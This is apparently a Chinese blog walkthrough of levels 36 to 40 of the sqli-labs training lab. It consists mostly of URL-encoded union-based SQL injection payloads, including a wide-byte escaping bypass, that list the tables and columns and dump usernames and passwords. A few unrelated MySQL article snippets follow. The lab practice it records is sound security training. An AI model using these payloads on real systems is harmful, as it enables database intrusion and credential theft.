sql-labs36-40通关攻略
时间:2024-08-27 20:21:29浏览次数:9
标签:27 http Less 40 labs36 1% --+ sql id
第36关
一.判断闭合点
http://127.0.0.1/Less-36/?id=1%df%20--+http://127.0.0.1/Less-36/?id=1%df%20--+
二.查询数据库
http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,database(),3--+http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,database(),3--+
三.查表
http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%20%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%20%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+
四.查列
http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=0x656D61696C73--+http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=0x656D61696C73--+
五.查user表里所有数据
http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,group_concat(id,username,0x3a,password),3%20from%20users--+http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,group_concat(id,username,0x3a,password),3%20from%20users--+
第37关
一.进入brup抓包
进入重放器
二.查询数据库
uname=-1%df' union select database(),2#&passwd=1&submit=Submit
三.查表
uname=-1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=Submit
四.查列
uname=-1%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x656D61696C73#&passwd=1&submit=Submit
五.查user表里所有数据
uname=-1%df' union select 1,group_concat(id,0x3a,email_id) from emails#&passwd=1&submit=Submit
第38关
一.判断闭合点
http://172.16.1.41/Less-38/?id=1%27--+http://172.16.1.41/Less-38/?id=1%27--+
二.查询数据库
http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,database()--+http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,database()--+
三.查表
http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)--+http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)--+
四查列
http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)%20--+http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)%20--+
五查user表里所有数据
http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)%20--+http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)%20--+
第 39关
一.判断闭合点
http://172.16.1.41/Less-39/?id=1--+http://172.16.1.41/Less-39/?id=1--+
二.查询数据库
http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,database()--http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,database()--
三.查表
http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)%20--+http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)%20--+
四.查列
http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)%20--+http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)%20--+
五.查user表中所有数据
http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)--+http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)--+
第40关
一.判断闭合点
http://172.16.1.41/Less-40/?id=1%27)--+http://172.16.1.41/Less-40/?id=1%27)--+
二.查询数据库
http://172.16.1.41/Less-40/?id=-1%27)%20union%20select%201,database(),3--+http://172.16.1.41/Less-40/?id=-1%27)%20union%20select%201,database(),3--+
三.查表
http://172.16.1.41/Less-40/?id=1%27)%20union%20select%201,database(),(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+http://172.16.1.41/Less-40/?id=1%27)%20union%20select%201,database(),(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+
四.查列
http://172.16.1.41/Less-40/?id=-1%27)%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)%20--+http://172.16.1.41/Less-40/?id=-1%27)%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)%20--+
五.查user表里所有数据
http://172.16.1.41/Less-40/?id=-1%27)%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)--+http://172.16.1.41/Less-40/?id=-1%27)%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)--+
标签:27,
http,
Less,
40,
labs36,
1%,
--+,
sql,
id
From: https://blog.csdn.net/m0_75036923/article/details/141607427
相关文章
- mysql基础
一、启停说明:docker部署dockerps-a|grepmysqldockerstart/stopname二、客户端1、命令行连接mysql-h127.0.0.1-P3306-uroot-p参数说明-h数据库地址-P端口-u用户-p密码-D库名--help帮助2、工具连接如navicat,需要自行破解......
- 自动化部署Mysql数据库的脚本
#!/bin/bash#authorhlc#createTime2024-06-17#modifyTime2024-06-18#version1.0#description自动安装Mysqlsource/etc/init.d/functions#定义参数#用于循环count=0#时间date=$(date"+%H:%M:%S:%N")#==========Mysql服务器参数==========#Mysql服......
- MySQL 2003 - Can’t connect to MySQL server on ' '(10060)
2003-Can’tconnecttoMySQLserveron''(10060) 一般是以下几个原因造成的:1.网络不通畅2.mysql服务未启动3.防火墙未开放端口4##云服务器的安全组规则未设置 一般是以下几个原因造成的:1.网络不通畅:【mysql-u-p,看看能不能登陆】2.mysql服务未启动:......
- sqli-labs靶场通关攻略(36-40关)
第36关(宽字节注入(BypassMySQLRealEscapeString))查数据库?id=-1%df%27%20union%20select%202,database(),3%20--+ 查表?id=-1%df'unionselect1,group_concat(table_name),3frominformation_schema.tableswheretable_schema=database()--+查列?id=-1%df'uni......
- WAF一般是怎么防御SQL注入的
目录参数化查询在防止SQL注入中起到什么作用?为什么要限制数据库用户权限来预防SQL注入?WAF是如何检测SQL注入特征的?WAF防范SQL注入的主要策略包括:参数化查询和预编译语句:使用参数化查询或预编译语句可以确保用户输入不会被解释为SQL代码,从而避免了SQL注入攻击。输入验......
- 软设每日一练1——(16进制快速算结果)若用256K×8bit存储器芯片,构成地址40000000H到400F
题目:若用256K× 8bit的存储器芯片,构成地址40000000H到400FFFFFH且按字节编址的内存区域,则需( )片芯片A.4 B.8 C.16 D.32 答案:A解:1、首先看单位,存储器芯片单位是256K× 8bit,地址是字节......
- MYSQL新能优化策略
一.一般语句优化1.选择合适的数据类型以及字符集:使用合适的数据类型可以减少存储空间和提高查询速度。这个可不能小看,数据量到达一个量级,这个就能看出明显差异。例子:对于布尔值使用TINYINT(1)而不是CHAR(1)比如你有一个字段是表示业务状态或者是类型。CREATETABLEusers......
- 10W级并发Mysql优化
批量插入(BatchInsert)批量处理:将多条数据合并成一个INSERT语句,一次性批量插入。这样可以显著减少数据库的交互次数,提高性能。INSERTINTOyour_table(column1,column2,...)VALUES(value1,value2,...),(value3,value4,...)批量大小:通常建议每批次的大小在几百到几......
- mysql磁盘碎片整理
背景数据结转过程中经常进行delete操作,产生空白空间,如果进行新的插入操作,MySQL将尝试利用这些留空的区域,但仍然无法将其彻底占用,于是造成了数据的存储位置不连续,以及物理存储顺序与理论上的排序顺序不同,久而久之就产生了碎片。碎片治理思路根据线上处理经验总结比对4种处理......
- ETL学习之SQL Server数据库常用SQL语句
在数据仓库和ETL(提取、转换、加载)过程中,SQLServer数据库是一个广泛使用的平台。ETL工程师需要熟练掌握SQL语句,以便有效地从源系统中提取数据,进行转换,并将其加载到目标数据库中。本文将介绍一些ETL工程师常用的SQLServer数据库SQL语句。1.数据提取(Extract)查询特定列SELEC......